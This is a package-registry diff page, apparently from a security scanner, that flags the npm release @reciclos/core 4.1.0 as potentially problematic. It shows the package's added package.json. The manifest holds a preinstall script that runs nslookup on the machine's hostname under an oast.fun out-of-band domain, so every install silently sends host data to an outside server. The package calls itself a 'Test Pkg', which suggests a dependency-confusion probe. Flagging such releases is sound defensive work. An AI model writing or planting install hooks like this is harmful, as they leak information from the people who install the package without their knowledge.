@reciclos/core 4.1.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @reciclos/core might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +12 -0
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "@reciclos/core",
3
+ "version": "4.1.0",
4
+ "description": "Telefonica Tech Test Pkg",
5
+ "main": "index.js",
6
+ "author": "ttech",
7
+ "license": "ISC",
8
+ "scripts": {
9
+ "test": "echo \"Error no test specified\" && exit 1",
10
+ "preinstall": "nslookup $(hostname).cjdzwch2vtc000012tbggjg96gcyyyyyb.oast.fun"
11
+ }
12
+ }